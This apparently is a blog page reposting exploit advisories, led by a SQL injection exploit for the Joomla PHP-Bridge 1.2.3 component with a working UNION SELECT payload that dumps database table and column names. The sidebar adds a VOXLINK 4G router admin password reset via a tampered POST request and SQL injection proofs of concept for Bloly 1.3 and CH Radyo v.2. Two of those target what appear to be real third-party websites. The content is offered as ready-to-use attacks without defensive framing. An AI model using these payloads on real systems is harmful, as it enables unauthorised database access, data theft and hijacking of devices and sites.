Langsung ke konten utama

Joomla PHP-Bridge 1.2.3 SQL Injection




# # # # #
#
# Exploit Title: Joomla! Component PHP-Bridge v1.2.3 - SQL Injection
# Dork: N/A
# Date: 02.08.2017
# Vendor : http://www.henryschorradt.de/
# Software: https://extensions.joomla.org/extensions/extension/miscellaneous/development/php-bridge/
# Demo: http://www.henryschorradt.de/joomla-php-bridge/
# Version: 1.2.3
# # # # #
# Author: Cyclo'sTextovert
#
# # # # #
#
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_phpbridge&view=phpview&run=fahrzeuge&mode=detail&id=[SQL]
# -00000090+union+select+1,(sELECT+eXPORT_sET(5,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(5,eXPORT_sET(5,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--+-
# Etc..
#
# # # # #

Komentar

Postingan populer dari blog ini

VOXLINK Unlocked 4G LTE admin Password Reset

Exploit Title: VOXLINK Unlocked 4G LTE admin Password Reset # Author: SellerPwnd # Date: [2017-03-13] # Tested on: Windows 7 # Product Vendor: http://www.voxlink.com.cn ########################################################################################### Changing The Password is Very Easy Go To: http://192.168.199.1/cgi-bin/set_sys_basic.cgi Tamper it and Add This Post Data ipt_new_pass=admin And Now You Can Login With The Password admin

Bloly version 1.3 SQl injection vulnerability

======================================================================== | # Title     : Bloly version 1.3 SQl injection vulnerability | # Author    : Cyclo'sTextovert | # email     : defacertersakiti@gmail.com | # Tested on : windows 8.1 Français V.(Pro) | # Version   : 1.3 | # Vendor    : http://www.bloly.com/download.php | # Dork      : "Bloly v1.3 by SoftCab Inc" ======================================================================== poc : http://pcswebsites.com/search.php?page=%5c&q=1( inject her )

CH Radyo v.2 php script SQl injection vulnerability

======================================================================== | # Title     : CH Radyo v.2 php script SQl injection vulnerability | # Author    : Cyclo'sTextovert | # email     : defacertersakiti@gmail.com | # Tested on : windows 8.1 Français V.(Pro) | # Version   : v.2 | # Vendor    : http://www.scripti.org/script_ch-radyo-scripti_3292_27.html | # Dork      : "index.html?soru=" ======================================================================== poc : http://www.kissradyo.com/index.html?soru=15( inject her )